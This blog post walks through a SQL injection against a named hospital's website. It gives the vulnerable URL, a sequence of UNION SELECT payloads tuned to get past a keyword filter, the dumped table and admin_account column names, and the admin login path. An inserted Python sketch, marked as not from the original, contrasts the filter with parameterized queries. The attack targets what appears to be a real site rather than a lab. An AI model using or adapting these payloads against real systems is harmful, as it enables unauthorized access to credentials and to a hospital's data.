
Zhicheng Hospital (志城医院) SQL Injection in Practice

Injection point

http://www.c-c-chen.com.tw/news_detail.php?id=1

Blocking log

  1. /0 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name='admin_account'

    Tried replacing certain characters:

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns
    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()
    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name=
    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name=admin
    /0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name="admin"
    union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()

    Result: /0 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name="admin_account" succeeded in retrieving the data

    Guess: ='' is blocked by the whitelist

  2. /0 union select 1,2,group_concat(username,"-" ,pass_word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from c_c_chen_db.admin_account

    Result: /0 union select 1,2,group_concat(username,666,pass_word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from c_c_chen_db.admin_account

    Guess: ,"" is blocked
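
The blocking log above shows a pattern filter rejecting some request strings while a reworded one still reaches the database. As an added example (not from the original post), this Python sketch contrasts that design with type validation plus a bound parameter; the in-memory SQLite database stands in for the site's PHP/MySQL stack, and the table contents, function names, filter patterns and sample inputs are all constructed assumptions.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the application's database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin_account (username TEXT, pass_word TEXT);
        INSERT INTO news VALUES (1, 'Clinic hours');
        INSERT INTO admin_account VALUES ('demo_admin', 'demo_hash');
    """)
    return db

# Assumed filter: the two character patterns the post guesses were blocked.
BLOCKED = ("='", ',"')

def filtered_concat(db, raw_id):
    """'Before' form: pattern filter, then string concatenation into SQL."""
    if any(p in raw_id for p in BLOCKED):
        return None  # request rejected by the filter
    # The value is still parsed as SQL, so the filter is the only barrier.
    return db.execute("SELECT id, title FROM news WHERE id=" + raw_id).fetchall()

def parameterized(db, raw_id):
    """Hardened form: enforce the expected type, then bind the value."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return None  # an id is a non-negative integer, nothing else
    # The bound value is data only; it can never change the query structure.
    return db.execute(
        "SELECT id, title FROM news WHERE id=?", (int(raw_id),)
    ).fetchall()

# Constructed inputs shaped like the post's strings, reduced to two columns.
BLOCKED_INPUT = ("0 union select username,pass_word from admin_account "
                 "where username='demo_admin'")
REWORDED_INPUT = "0 union select username,pass_word from admin_account"

if __name__ == "__main__":
    db = make_db()
    for value in ("1", BLOCKED_INPUT, REWORDED_INPUT):
        print(repr(value))
        print("  filter + concat :", filtered_concat(db, value))
        print("  parameterized   :", parameterized(db, value))
```

The filter stops only the exact strings it lists, while the parameterized query rejects every non-integer id regardless of wording.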

Data results

Database name

Admin backend: /admin/login.php

Tables: active_news,active_news_class,active_photo,activity_rpt,activity_rpt_class,admin_account,comm_serv,comm_serv_class,doctor_data,event_photo,event_photo_pic,faq_rpt,health_area,health_area_class,health_download,health_download_class,health_download_series,learn_activity,links_rpt,medical_main_dep,medical_serv_article,medical_serv_section,medical_sub_dep,ops_timetable,personnel_download,profile_article,profile_section,profile_section_en,reg_online,ward_guide

Columns of the admin_account table: id,username,realname,dep,job,e_mail,acc_status,start_date,end_date,pass_word,remark,authority,upd_man,upd_date,keyin_man,keyin_date

Existing username/pass_word pairs:


Zhicheng Hospital (志城医院) SQL Injection in Practice
https://firefly.cuteleaf.cn/posts/sql/志城医院/
Author: Lireal
Published: 2026-01-20
License: CC BY-NC-SA 4.0